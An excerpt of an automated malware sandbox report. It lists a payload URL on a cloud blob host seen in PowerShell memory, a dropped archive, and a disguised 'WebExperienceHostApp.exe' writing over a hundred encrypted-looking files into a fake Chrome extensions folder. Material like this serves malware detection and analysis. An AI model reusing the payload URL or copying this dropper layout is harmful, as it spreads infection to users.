Source: powershell.exe, 00000003.00000002.1807784521.00000000049A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1813694742.0000000006E9F000.00000004.00000020.00020000.00000000.sdmp, scrE6C2.ps1.2.dr, 67df31.rbs.1.dr	String found in binary or memory: https://webdocs75912232658.blob.core.windows.net/z102022/ufilesxls.xls
Source: powershell.exe, 00000003.00000002.1807784521.0000000004E84000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://webdocs75912232658.blob.core.windowsp

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\appData\10062024.zip entropy: 7.99980728113	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.34 entropy: 7.99824305433	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.35 entropy: 7.99790959486	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.36 entropy: 7.99754718991	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.37 entropy: 7.99770998551	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.38 entropy: 7.99715340846	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.39 entropy: 7.99776227345	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.4 entropy: 7.99046230266	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.40 entropy: 7.99399133173	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.41 entropy: 7.99713861921	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.42 entropy: 7.99667055392	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.43 entropy: 7.99414348537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.44 entropy: 7.99781831277	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.45 entropy: 7.99405865581	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.46 entropy: 7.99772013622	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.47 entropy: 7.99779597898	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.48 entropy: 7.99276827367	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.49 entropy: 7.99797758594	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.5 entropy: 7.99823961145	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 entropy: 7.99448796462	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.51 entropy: 7.99703199099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.52 entropy: 7.99497283467	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.53 entropy: 7.99807423749	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.54 entropy: 7.99531409722	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.55 entropy: 7.99674971497	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.56 entropy: 7.99474871603	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.57 entropy: 7.9982840934	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.58 entropy: 7.99246215184	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.59 entropy: 7.99409874979	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.6 entropy: 7.99754562168	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.60 entropy: 7.99738800393	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.61 entropy: 7.99460856626	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.62 entropy: 7.99798601902	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.63 entropy: 7.99432159953	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.64 entropy: 7.99815865014	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.65 entropy: 7.99622567341	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.66 entropy: 7.9951105294	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.67 entropy: 7.9974883893	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.68 entropy: 7.99846732736	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.69 entropy: 7.99701507902	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.7 entropy: 7.99791398394	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.1 entropy: 7.99832754142	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.10 entropy: 7.99805977047	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.70 entropy: 7.99460045101	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.71 entropy: 7.99805655456	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.72 entropy: 7.99528518128	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.73 entropy: 7.99752214025	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.74 entropy: 7.9979940302	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.75 entropy: 7.99403941576	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.76 entropy: 7.99805834668	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.77 entropy: 7.99594269497	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.78 entropy: 7.99832335849	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.79 entropy: 7.99474667993	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.100 entropy: 7.99814455019	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.101 entropy: 7.99805920411	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.102 entropy: 7.99398437537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.103 entropy: 7.9969613831	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.104 entropy: 7.99837165529	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.105 entropy: 7.99490534733	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.106 entropy: 7.99816744472	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.107 entropy: 7.99516845459	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.109 entropy: 7.99829884537	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.8 entropy: 7.99833024695	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.80 entropy: 7.99725858533	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.81 entropy: 7.99805459791	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.82 entropy: 7.99401136409	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.83 entropy: 7.99790203419	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.84 entropy: 7.99456452064	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.85 entropy: 7.99905143323	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.86 entropy: 7.997904103	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.87 entropy: 7.99772075385	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.88 entropy: 7.99299422459	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.11 entropy: 7.99404648214	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.110 entropy: 7.99610810388	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.111 entropy: 7.99867490099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.112 entropy: 7.99779818478	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.113 entropy: 7.99791560708	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.114 entropy: 7.99420401473	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.115 entropy: 7.9976080306	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.116 entropy: 7.9941388261	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.117 entropy: 7.99835871385	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.118 entropy: 7.99471154974	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.89 entropy: 7.99836997664	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.9 entropy: 7.99812769595	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.90 entropy: 7.993925773	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.91 entropy: 7.99668825058	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.92 entropy: 7.9981015402	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.93 entropy: 7.99479992523	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.94 entropy: 7.99806786473	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.95 entropy: 7.99503182523	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.96 entropy: 7.99820951674	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.97 entropy: 7.99366192441	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.119 entropy: 7.99780940325	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.12 entropy: 7.99573288862	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.120 entropy: 7.99419790942	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.121 entropy: 7.99820009329	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.122 entropy: 7.9935670475	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.123 entropy: 7.99877373818	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.124 entropy: 7.99782036754	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.125 entropy: 7.99790353721	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.126 entropy: 7.99795396183	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.127 entropy: 7.99819061954	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.98 entropy: 7.99841208592	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.99 entropy: 7.99474767769	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.128 entropy: 7.99578707328	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.129 entropy: 7.99767920118	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.13 entropy: 7.99555057257	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.130 entropy: 7.99448073439	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.131 entropy: 7.99785714597	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.132 entropy: 7.99495719328	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.133 entropy: 7.99787043835	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.134 entropy: 7.99409008648	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 entropy: 7.99685420083	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.15 entropy: 7.99814258165	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.16 entropy: 7.99514210593	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.17 entropy: 7.99802992616	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.18 entropy: 7.99426880008	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.19 entropy: 7.99804200099	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.2 entropy: 7.99839321454	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.20 entropy: 7.99482421893	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.21 entropy: 7.99819014746	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.22 entropy: 7.99506507103	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.23 entropy: 7.99805207356	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.24 entropy: 7.99355397795	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.25 entropy: 7.99713455209	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.26 entropy: 7.9975483379	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.27 entropy: 7.99500009348	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.28 entropy: 7.99787066785	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.29 entropy: 7.9932411667	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.3 entropy: 7.997978048	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.30 entropy: 7.99752780953	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.31 entropy: 7.99330413873	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.32 entropy: 7.9982834495	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.33 entropy: 7.99517225944	Jump to dropped file

System Summary

PE file contains section with special chars

Source: chrome_elf.dll.5.dr	Static PE information: section name: .?rL
Source: chrome_elf.dll.5.dr	Static PE information: section name: .'p"

Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\67df2f.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE0C6.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE134.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE164.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE184.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE1F2.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{B95F3E55-F3A2-459E-ACB1-42A9918E3822}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE280.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE62B.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIE0C6.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA59C50	5_2_00007FFDFBA59C50
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA52430	5_2_00007FFDFBA52430
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA5B3A0	5_2_00007FFDFBA5B3A0
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA73300	5_2_00007FFDFBA73300
